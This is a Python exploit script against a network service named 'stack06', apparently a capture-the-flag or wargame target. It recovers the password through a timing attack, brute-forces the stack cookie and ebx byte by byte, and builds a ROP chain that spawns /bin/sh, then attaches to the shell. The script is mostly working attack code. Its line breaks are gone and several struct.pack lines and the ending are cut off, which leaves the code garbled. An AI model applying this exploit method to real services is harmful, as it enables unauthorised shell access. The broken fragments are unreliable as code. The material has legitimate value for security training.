#!/usr/bin/python import struct import os,sys import socket import random import string import telnetlib import time import base64 # Setup ip=sys.argv[1] port=int(sys.argv[2]) fd=int(sys.argv[3]) def get_connection(ip,port): s=socket.socket() s.connect((ip,port)) return s def check_password(s, password): req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password) s.send(req) resp = "" # while not resp.endswith("\r\n\r\n"): # resp = s.recv(1024) resp = resp + s.recv(1024) # print "[*] Received: ", repr(resp) auth = "Unauthorized" not in resp # print "[*] Returning ", auth return (auth, resp) # First find auth password def find_next_char(password): done = False for current_char in string.ascii_letters+string.digits: s = get_connection(ip,port) t0 = time.time() found,resp = check_password(s, password+current_char) t1 = time.time() # print "Time diff: ", (t1-t0) #IF found or time indicates current char is good... s.close() if found or (t1-t0) < 0.001: print "[*] Found character %d = %s" %(len(password)+1,current_char) return (found,password+current_char) # print "[*] Could not find password, aborting :(" # sys.exit(0) return (False,password) def find_password(): password = "" found = False while(not found) and len(password)<16: (found,password) = find_next_char(password) # s.close() return password def find_cookie(password,cookie = ""): while len(cookie)!=4: for i in xrange(256): # print "[*] Test ", i s = get_connection(ip,port) found,resp = check_password(s,password + "A"*2024+ cookie + chr(i)) if "smashing" not in resp: # print resp cookie = cookie + chr(i) print "[*] Cookie value is 0x%s" % cookie.encode("hex") break else: print resp s.close() return cookie def find_ebx(password,cookie): ebx = "" #\x18" s = get_connection(ip,port) found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3) s.close() while len(ebx)<4: for i in xrange(0,256): try: s = get_connection(ip,port) found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) ) s.close() if resp == base_resp: ebx = ebx + chr(i) print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex") break except socket.error: # print "[*] Fail" pass if i==255: print "[*] Could not discover ebx value. Exploit failed." sys.exit(-1) return ebx def get_telnetlib(s): t = telnetlib.Telnet() t.sock = s return t def get_rop(libc): # execve /bin/sh generated by RopGadget v3.3 p = struct.pack(" will hold /bin p += struct.pack(" hold //sh p += struct.pack(" goes to ecx p += struct.pack(" we put a null there p += struct.pack(" this goes to ebx, which points to str p += struct.pack(" /bin/sh into ebx! ROPGadget generated a wrong payload here! p += struct.pack(" 4: password = sys.argv[4] print "[*] Using user supplied password, ", password else: print "[*] Using timing attack to discover password " password = find_password() print "[*] Found password: ", password if len(sys.argv)>5: cookie = sys.argv[5].decode("hex") print "[*] Using user supplied cookie: " , sys.argv[5] else: print "[*] Discovering cookie" cookie = find_cookie(password) if len(sys.argv)>6: ebx = sys.argv[6].decode("hex")[::-1] print "[*] Using ebx = 0x%s" % sys.argv[6] else: # ebx = "\x18" # This is the LSB of the original ebx print "[*] Attempting leak of ebx" ebx = find_ebx(password,cookie) base = struct.unpack("